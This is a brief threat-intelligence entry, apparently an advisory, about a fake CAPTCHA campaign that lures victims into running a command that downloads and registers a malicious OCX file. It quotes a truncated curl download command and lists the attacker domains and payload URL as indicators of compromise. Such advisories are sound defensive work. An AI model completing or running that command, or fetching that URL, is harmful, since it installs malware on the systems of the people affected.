MalwareApr 28, 2026
Also related fake captcha page: https://screenly[.]cam/ Command: "cmd /c curl -sko %TEMP%\mscomct...
Malware campaign distributes fake CAPTCHA page and OCX downloader via command injection.
Summary
A malware campaign uses a fake CAPTCHA page hosted at screenly[.]cam to social engineer victims into executing malicious commands. The payload downloads a malicious OCX (ActiveX control) file from xtrafftrck[.]net and registers it via regsvr32, establishing code execution on compromised systems. This represents a classic multi-stage attack combining social engineering with Windows COM object exploitation.
Indicators of Compromise
- domain — screenly.cam
- domain — xtrafftrck.net
- url — https://xtrafftrck.net/files/updater.ocx
Entities
ActiveX/OCX (technology)regsvr32 (technology)